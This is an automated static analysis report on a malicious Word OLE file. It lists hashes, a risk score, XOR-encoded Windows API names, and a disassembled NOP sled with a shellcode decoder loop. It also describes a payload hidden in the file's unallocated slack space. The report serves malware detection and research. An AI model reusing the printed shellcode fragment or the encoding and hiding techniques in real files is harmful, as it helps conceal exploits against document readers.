Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eb5b31935a41f6a5…

MALICIOUS

Office (OLE)

529.0 KB Created: 2007-12-03 01:19:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-30
MD5: 34c014726ab9271880fe466eb966687b SHA-1: d2a439c6c44de3ede162458d14714dc290d3a5f5 SHA-256: eb5b31935a41f6a587459cbf22476b248c4eed70ce5e2724244ed9e73592964d
140 Risk Score

Heuristics 3

  • XOR-encoded strings (key 0x95) critical SC_XOR_ENCODED
    Found 8 Windows library/API name(s) XOR-encoded with single-byte key 0x95: 'kernel32.dll', 'LoadLibraryA', 'LoadLibraryW', 'GetProcAddress', 'VirtualAlloc', 'VirtualAlloc', 'VirtualAllocEx', 'VirtualProtect'
    Disassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'add' is 79% of instructions — a sled or padding/filler run, not program logic).
  • NOP sled detected high SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly
    x86 disassembly · validity: uncertain (0.568) — 5/7 branch targets land on an instruction boundary (71% coherence)
    00001900  90                nop
    00001901  90                nop
    00001902  90                nop
    00001903  90                nop
    00001904  90                nop
    00001905  90                nop
    00001906  90                nop
    00001907  90                nop
    00001908  90                nop
    00001909  90                nop
    0000190A  90                nop
    0000190B  90                nop
    0000190C  90                nop
    0000190D  90                nop
    0000190E  90                nop
    0000190F  90                nop
    00001910  90                nop
    00001911  90                nop
    00001912  90                nop
    00001913  90                nop
    00001914  90                nop
    00001915  90                nop
    00001916  90                nop
    00001917  90                nop
    00001918  90                nop
    00001919  90                nop
    0000191A  90                nop
    0000191B  90                nop
    0000191C  90                nop
    0000191D  90                nop
    0000191E  90                nop
    0000191F  90                nop
    00001920  57                push edi
    00001921  5b                pop ebx
    00001922  81ebf0150000      sub ebx, 0x15f0
    00001928  8bd3              mov edx, ebx
    0000192A  4a                dec edx
    0000192B  33c9              xor ecx, ecx
    0000192D  b9a7030000        mov ecx, 0x3a7
    00001932  80340ab0          xor byte ptr [edx + ecx], 0xb0
    00001936  e2fa              loop 0x1932
    00001938  315cb0b1          xor dword ptr [eax + esi*4 - 0x4f], ebx
    0000193C  b0b0              mov al, 0xb0
    0000193E  3b5c3375          cmp ebx, dword ptr [ebx + esi + 0x75]
    00001942  b43b              mov ah, 0x3b
    00001944  3f                aas
    00001945  78b2              js 0x18f9
    00001947  b0b0              mov al, 0xb0
    00001949  39fd              cmp ebp, edi
    0000194B  e83b3f08b2        call 0xb208588b
    00001950  b0b0              mov al, 0xb0
    00001952  39fd              cmp ebp, edi
    00001954  e431              in al, 0x31
    00001956  7768              ja 0x19c0
    00001958  b1b0              mov cl, 0xb0
    0000195A  b03b              mov al, 0x3b
    0000195C  7f39              jg 0x1997
    0000195E  3d                .byte 0x3d
    0000195F  30                .byte 0x30
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 541,696 bytes but its declared streams total only 16,486 bytes — 525,210 bytes (97%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).